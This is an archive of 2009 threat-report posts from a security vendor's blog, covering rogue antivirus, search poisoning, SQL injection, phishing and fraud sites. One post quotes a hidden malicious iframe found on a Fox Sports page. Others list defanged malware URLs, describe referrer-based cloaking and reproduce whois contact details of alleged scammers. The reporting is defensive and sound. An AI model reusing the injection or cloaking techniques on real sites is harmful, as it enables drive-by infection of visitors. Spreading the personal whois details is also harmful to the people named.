Tuesday, December 22, 2009

Live.com Exploited as Pharma-Fraud Cover

The FDA crackdown on online pharmacy sites has driven a lot of attention to illegal and fraudulent online pharmacies and in particular to their methods for tricking people to visit their sites. These practices include prolific spam and search engine poisoning.

eSoft’s Threat Prevention Team has noticed that the search engine poisoning is now very actively making use of Microsoft’s Windows Live Spaces – a free blog hosting environment. By registering accounts and using those accounts solely to link to the pharma-fraud sites, the search engine ranking of the target sites goes up. Additionally, the spam emails now link to these fake blogs rather than directly to the pharma-fraud site in an effort to better evade spam filters that might otherwise detect the link to the fraudulent website.

The blog page shown here is typical of those seen by the Threat Prevention Team: it consists of a single blog entry with a single image that is linked to a classic “Canadian Pharmacy” website using a template that eSoft has seen used on thousands of websites.  eSoft worked with the ThreatChaos blog to shine the light and provide full details on these sites during a major outbreak in May.  More details about this threat may be found in that posting.

Similar attacks have been reported recently using Yahoo and Blogger to draw users to fraudulent pharmacy sites. Google Job Spam has also reportedly infiltrated spaces.live.com.

Whatever the distribution method, its clear these cybercriminals will stop at nothing and continue to evolve new ways of advertising their bogus sites. eSoft has excellent detection for pharma-fraud sites and detects thousands of these URLs month after month.  Exploited blogs on spaces.live.com are being flagged as ‘Phishing & Fraud’.

Tuesday, December 15, 2009

Boeing 787 Searches Hijacked by Rogue AV

Today, the Boeing 787 Dreamliner jet completed its much awaited first flight. As users searched to find videos and news articles related to the story, blackhats quickly moved in for yet another attack against Google search results.

The most popular search for several hours today was “787 first flight video”. This search and related searches are saturated with malicious results leading to rogue AV and potentially other malicious payloads.

At peak hours, 5 out of the first 9 results lead to malicious payloads as users were pushed through a series of redirect pages and to different distribution points.

While the distribution points and payloads varied, their effectiveness did not. Most sites were undetected by Google Safe Browsing and the malicious payloads they delivered had very low anti-virus detection rates.

This latest attack is nothing new, but it is shocking how quickly and effectively cybercriminals are able to react to the latest news trends. In this particular attack, the dangerous top results seemed to be compromised sites with existing reputations which makes detection much more difficult.

Saturday, December 12, 2009

eSoft Uncovers 1.5 Million Sites in SQL Injection Attacks

The eSoft Threat Prevention Team has uncovered an additional 1.5 million sites associated with the newest series of SQL injection attacks. Any compromised sites are very dangerous, infecting the user with Trojan.Buzus silently in the background. The Buzus family of trojans can steal passwords, financial data, and other sensitive information.

Note: Any sites listed below are dangerous and should not be followed without proper protection.

The compromised pages are injected with the same script several times in and around the title and meta tags, as well as other locations. Injected sites in this attack share the common characteristic of “script src=http” and a varying script source.

The list below shows the injected domains used in this attack. The number next to each domain is the amount of sites found to be injected with the domain using Google search.

Each domain hosts the same javascript, using small or hidden iframes to redirect users to other malicious sites where the final payload is delivered. These domains use the same technique described by Scansafe last week in the 318x injection. As many as 300,000 sites were reported compromised in that attack. An example is shown below, note each of the sites in the image is also dangerous so do not attempt to view linked sites.

Additionally, the Threat Prevention Team uncovered the related sites below, also using the same type of injection and javascript iframe technique. The javascript shown below is slightly different than the first attack, only using two iframes but infecting users and tracking with the same method.

eSoft is adding detection for these attacks and flagging any victimized sites as compromised. Distribution and redirect sites are marked as malicious, protecting users from downloading the final dangerous payload.

Wednesday, December 9, 2009

Fraudsters Deliver Another Round of Federal Reserve Emails

During the last week, the eSoft Threat Prevention Team has detected a number of malicious emails, allegedly from the Federal Reserve Bank. The emails warn the recipient of phishing attacks and instruct the user to follow a link for more detailed information on the threat.

The email appears to be legitimate, sporting the Federal Reserve emblem and containing a real looking domain, federalreservebank-oh.com. However, users following the link are exposed to malicious payloads, most recently the Oficla Trojan.

Similar Federal Reserve Bank scams have been around for quite some time and are often used for phishing attacks. Example URLs contained in this newest rash of emails are shown below.


Always be cautious in following links in emails, particularly unexpected messages. If there is any doubt, contact the sender directly to verify the legitimacy of the message. The Threat Prevention Team is flagging these URLs as malicious, protecting SiteFilter customers from this threat. 

Friday, November 20, 2009

Scareware Taints Chromium OS Searches

Yesterday, Google announced the open source project called Chromium OS, a development phase release of the Google Chrome OS. Blackhats have quickly taken advantage of this announcement, poisoning search results to spread scareware.

Attackers continue to perform Blackhat SEO attacks on Google searches, particularly trending topics. Dangerous results are returned linking the user to Rogue Anti-Virus downloads through a series of scripts and redirects.

The search terms used in this example are "chromium os download", though any combination of terms could return dangerous results. The 5th result in the search below leads to scareware.

Clicking the link takes the user through a series of redirects, ultimately ending up at the distribution point. As with most Rogue AV scams, a fake system scan is performed informing the user their system is virus laden and opening a download to remove the threat.

Even if the user attempts to cancel, the rogue installer starts to download a setup.exe file. The file has low anti-virus detection, as is common with Rogue AV scams and the user is led to believe the download is safe to install.

After a standard installation, the user is now infected with "SecureKeeper". This is a brand new variant first reported by Sunbelt just yesterday. 

After running another fake system scan, the software reports 736 infections and prompts the user to enter a registration key, or purchase the software. Some very scary messages are displayed, warning the user that criminals will gain access to their credit card and personal information.


Warnings will perpetually appear in the system tray, persuading the user to complete the purchase. For just $49.95 USD you can own this piece of malware...

This is a very typical attack that continues to happen all too often. Attackers will regularly change redirect URLs, malware distribution points and final payloads. This allows them to keep PageRank high and evade detection by anti-virus programs and web filters. The sites are further protected by checking the referring site to ensure the infected page can only be accessed from Google search results.

Raising awareness about this type of scam is one of the most effective ways to keep users safe. Other search engines are targeted less by attackers, which may make them safer for the novice user. eSoft tracks attacks on trending topics and is marking any associated sites as malicous.

Tuesday, November 17, 2009

Blackhats Unleash Another Fake Blog Campaign

In September, eSoft reported as many as 720,000 compromised sites hosting fake blog pages and being used to distribute rogue anti-virus programs. Many of these sites are still active and continue to plague searches with malicious results.

Earlier today, Cyveillance issued this report of a nearly identical attack with over 260,000 dangerous URLs prompting the Threat Prevention Team to revisit this threat.

Between the newly reported Cyveillance URLs and additional URLs discovered by the eSoft there are now well over 800,000 active URLs matching this pattern. Surprisingly, Google only detects a small portion of these sites as malicious.

The key to this scheme is javascript uploaded to the compromised server and used in the fake blog pages. The file, css.js, contains obfuscated javascript which redirect users to Rogue AV if the site is accessed through certain search engines.

Using this technique allows the attackers to quickly and easily change distribution points and payloads. The current payloads have low detection rates among AV scanners.

In addition to the URL strings reported by Cyveillance be on the lookout for these additional URL types.

eSoft will continue to flag associated domains into their appropriate security categories, protecting SiteFilter users from falling victim to this attack.

Thursday, November 12, 2009

CoolerEmail Hit by Phishing Scam

CoolerEmail is notifying customers of a new phishing scam used to steal login credentials. The web based email marketing program carries an impressive client list including Walmart, Toyota, Pepsi and dozens of other big name brands. Any phished credentials can be used to impersonate these companies in additional phishing or malicious emails.

If you’ve been victimized by this scam change your password immediately at the CoolerEmail website.

The fraudsters use a classic phishing “hook” and present a very real looking email, complete with company letterhead. The email reports a recent software upgrade and asks users to follow a link in order to confirm their account details.

The disguised link suggests the user will connect directly to the cooleremail.com website. However, the link actually connects to cooleremail1.com – a domain setup by cybercriminals specifically for the phish.

Whois information shows this domain as recently registered and is not in any way affiliated with CoolerEmail.

CoolerEmail has sent out a warning notice to customers and stated that they would never ask for confirmation of account details. Always be wary of emails containing any type of link or asking to update account information. If there is any doubt, contact the sender to verify the legitimacy of the email. 

Thursday, November 5, 2009

Japanese Hosting Site Compromised

The eSoft Threat Prevention Team is today warning users to be wary of sites hosted on g0oo.info, a Japanese hosting site.  At this time, all blogs and other web sites hosted by g0oo.info are compromised and currently being used to boost the Google PageRank of various sites including Japanese pornography sites in a technique sometimes called "PageRank Bombing" and also referred to as "BlackHat SEO."

At a glance, these sites look normal, but at the bottom of the page is a small portion of a box that actually holds around 300 links to questionable and pornographic websites.  The Threat Prevention Team has found thousands of unique links so far.  At any time, the g0oo.info sites could be repurposed to something more dangerous, as could the target pornography websites.

Sample URL associated with the scheme:

eSoft has now flagged thousands of these URLs as "Compromised" and/or "Pornography" as appropriate in order to protect customers and partners who use eSoft's SiteFilter database and block those categories.

Friday, October 23, 2009

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam being detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo Marketing account has expired with a link to login and presumably reactivate the account.

If the user follows the link, they’re presented with an authentic looking login page where the phishing attack takes place. The username and password entered here are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.

The “hook” in this scam is a classic warning of impending account closure.  The domain being used to serve the phishing attack was registered only today, but has an authentic ring to it. The URLs also use a marketingsolutions.yahoo subdomain to make the URL seem more authentic.

At the time of detection, none of the major search engines or public phishing lists detected this URL as malicious.

Wednesday, October 21, 2009

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware which includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers using compromised sites to deliver their malware stand a better chance of evading web filters since those sites are generally already categorized in a "safe" category. The constant changing of the malware binaries also keeps the Anti-Virus detection rates low.

 eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social network worm that spreads using social engineering techniques. Users will typically receive a link to an alleged video. After clicking the link, the user is prompted to update their flash player or download a codec to view the video. Users who haven't been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through available social networks using the local users' accounts and targeting the infected users friends, family and business contacts. This social networking aspect is part of the lure of the social engineering and why its so successful. The video might require a download to view, but it came from a close friend so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface will often steal login credentials for social networking sites which it can then use to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:

eSoft is flagging these sites as 'Compromised'.

Friday, October 16, 2009

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago and as of today, at least one Fox Sports host continues to contain automatic links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The threats being hosted have rotated with the most recent threats being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar exploited pages that are leading to dangerous trojans.

nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video Control ActiveX vulnerabilities.

We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.

Wednesday, October 14, 2009

Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh twitter phishing campaign is underway and using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of the ones being used. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password info.

Wednesday, October 7, 2009

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but any added nonsensical path results in a 404 page with the malicious iframe to thingre.com. For example, the hxxp://msndr.foxsports.com/dffdd results in a malicious page leading visitors to malware. eSoft has not received any response from Fox Sports and the classification of the msndr.foxsports.com host remains "Compromised."

Monday, October 5, 2009

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to the 6m+ visitors ([popularity data] as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the World according to Alexa [populartiy data] remains compromised and a major security risk to end-users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection was cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have been discovered to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with some details that we hope will help their team clean up the website. When we hear back from them, we will post so here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network although at this time we believe the threat is specific to Fox Sports and not Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.


Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.

The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.

The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same. 

Monday, September 28, 2009

Blackhats Quickly Saturate Google With Tropical Storm Ondoy

Since tropical storm Ondoy hit the Philippine Capital on Saturday, attackers have wasted no time planting malicious pages claiming to host videos of the historic disaster. The city of Manila saw flooding on a level that hasn't been seen in decades and the pictures are jaw dropping. But for surfers looking to see those videos, searching on Google and following search results can be dangerous.

The actual attack is nearly identical to the attack reported last week where pages are artificially inflated in PageRank, driving them to the top of the search results. In one case, 8 of the 10 top results were found to be malicious. The actual malicious pages are only served up when users come from Google and at this time, anti-virus coverage for the installed malware is very low.

Many of these search results will take the user directly to a Fake AV download while others are more stealthy.

One of the more covert sites is hxxp://www.kolonne.nl/links/1/typhoon-ondoy-update.php. When opened using Google the user is shown the movie window with a play button. The play button is actually a link to hxxp://mycompscanner.com/download.php?id=169.

The user is prompted to install a missing "Active-X Patch" to view the video which leads them to the final payload, Fake AV software. There is no mention of anti-virus software and the user is led to unwittingly install the malicious file.

When Google search was not used to access the page the video image and link to the malicious download did not appear.

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

This is one of many trending search terms being targeted, including the few examples below.
  • Tim Tebow
  • Jenny Slate
  • Google Birthday
  • Roman Polanski
  • Yom Kippur
PageRank bombs using Google trending topics is one of the newest ways blackhats are spreading malware. The attackers are very responsive to the latest news and gossip, quickly posting new malicious sites to infect unsuspecting users.

Image Source: http://farm3.static.flickr.com/2555/3956145142_78422979bd.jpg

Monday, September 21, 2009

Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008.  The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost the search result ranking on various search engines.  Initially this was being used for ad sites, porn sites, and pharmafraud sites.  Now, however, it is being used to boost the results of malicious sites, but with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects.  However, the redirects and the malware are only served up if the user gets to the site after clicking the link on Google.  Going directly to the malicious site (by pasting into your browser directly) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 

Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:

The Trojan being downloaded at this point has only a 7% detection rate by anti-virus software with Microsoft, NOD32 and Panda detecting.

Some of the sites being used include:

These redirect through some URLs including:

As far as eSoft’s TPT can tell, the referrer must have this string, google.com/search?q=, in it  and the User-Agent must indicate a Windows machine or the malware will not be delivered.  It does not appear that users of other search engines or operating systems are yet being targeted.

Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).


Upon visiting the site, an obfuscated javascript file redirects the visitor to the one of several sites that host the malware payload.  Multiple redirect domains are being used to further obfuscate the final destination and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompts to download the supposed cure, which is in fact the malware.  This scheme is all too common and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August.  This latest appears to be the most widespread to date. 

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Friday, August 28, 2009

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old, but with new branding and promotional products, such as "Acai Power Slim" "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice any meaningful way to contact the site owners has been removed. An email form is present which presumably will never be answered. All of the domains found match the previous pattern and have been registered to Chinese ownership.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:
  • appleaboard.com
  • easyalong.com
  • fasterdevelop.com
  • pureacaisolution.com
  • sunnyact.com
More information on this scam is available on Wikipedia http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

Wednesday, August 26, 2009

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:



   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

         Valery Rigalo vrigalo77@inbox.ru +7.4999384712
         Novomariinskaya str., 11/1, apt. 38
         Moscow,N/A,RU 193901

Domain Name:computercodeplanet.com
Record last updated at 2009-01-06 12:08:08
Record created on 2009/1/6
Record expired on 2010/1/6

Domain servers in listed order:
         ns1.encatgpc.com        ns2.encatgpc.com


The Threat Prevention Team has also noticed many compromised sites including some government and educational sites, are linking back to these domains. This further substantiates the criminal intentions of these fraudsters. eSoft is flagging these URLs as “Phishing & Fraud.”

Friday, August 21, 2009

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern in website exploits over the last 24 hours. Since Thursday, Aug 20 eSoft has seen over 6,000 compromised URLs of the pattern:


And the numbers are growing at a rate of several hundred per hour. A google search for inurl:050609wareza shows around 30,000 such compromised sites.

The compromised sites typically have nonsense text and a series of pictures of pills with links to more compromised sites and dangerous scripts that trigger well known exploits including the recent exploit of the ActiveX streaming video control, discussed in this eSoft security bulletin:


In some cases, such as when eSoft researchers tried navigating to a compromised site using Firefox on Windows, a redirection to files express occurs:

In testing, when the exploit is successful, it seems to be an information stealing Trojan, though the payload has varied. As the payloads seem to have weak coverage by AV companies and seem to be changing frequently, blocking the offending websites is the best solution for preventing infection.

eSoft’s threat prevention team notes that around 1/3 of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published webalizer exploit. This exploit allows an attacker to execute arbitrary code, often with elevated privileges. More information on this exploit can be located below. It is recommended that administrators configure webalizer to not do reverse DNS lookups until a patch is released.


eSoft will continue to cover this threat and continue to protect customers from these websites by flagging them as Compromised. At the start of research, Google had very few of these sites flagged as malicious, but it seems that increasing numbers are being identified by their cloud security as well. Other security engines tested including Web of Trust, Norman, and Mcafee SiteAdvisor have very poor detection of these sites at this time.

Thursday, July 2, 2009

Have you heard the one about the independent testing lab?

They always independently verify that their client is the best.

Independent tests these days are a joke.

In the last week, two different reports from December 2008 came to my attention: one from Cascadia Labs commissioned by Trend Micro and the other from Tolly Group commissioned by Websense. They both have sections on the effectiveness of the major web filtering companies in blocking malicious websites.

Of these two reports, the Cascadia Labs report was slightly more fair ranking Trend Micro as able to block 53% of web threats (the highest -- presumably with Anti-Virus enabled as well as URL filtering) followed by McAfee (42%), Blue Coat (31%), Websense (23%) and IronPort (20%). I'm ignoring the SurfControl entry (9%) because since Websense bought SurfControl, the product is essentially defunct and SurfControl partners are being urged to change to Websense.

The Tolly Group report said, "In tests with 379 URLs containing binary exploits or compromise code, Websense blocked 99% of URLs, versus other vendors who blocked between 53% to 91%." Lets look just at the results for Websense versus Trend Micro in terms of exploit detection in the two tests:

ReportTrend MicroWebsense

Well, Trend Micro is consistent, but depending on who you ask, Websense is either twice as good or half as good. But here's the kicker, the Tolly report says, "All the URLs tested were mined from Websense ThreatSeeker network." So what they're saying is that Websense is very good (but not perfect) at detecting exploits on URLs it knows to have exploits.

Now here's the bottom line. A lot of folks make claims about security, but its a hard thing to verify. eSoft, the sponsor of this blog, for example, detected 35k new malicious URLs last week and has over 1.5m recently verified malicious URLs in its database at the moment. The combined lists of Google, Trend Micro, Sunbelt, PayPal, Mozilla, AOL, and Consumer Reports on the other hand have only 318k [source: stopbadware.org]. But these might be 318k not covered in the eSoft list, so the question becomes: how do you test these types of products?

I have some thoughts on how truly independent testing could be done including the collection and verification of malicious URLs without relying on a particular list that some vendor may already include directly, but I want to put it out there. What testing methodology should be used in a fair comparison of the ability of different products to block access to compromised, phishing, and otherwise malicious websites? And should the tests include things like malware call-home addresses? If so where does the source of URLs come from? And what is a fair sample size? What is a fair timeframe from first detection? Any feedback would be appreciated.

Friday, May 22, 2009

Return of the ThreatCenter blog

We've been dormant for awhile, but its time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious/ compromised websites, not securing of web servers) has produced amazing results and huge volumes and its time to share some of these results back to the greater community.

We recently shared some data on a few days worth of fraudulent pharmacy sites with Richart Stiennon who published the information on his ThreatChaos blog (if you haven't read the article, please check it out -- and digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.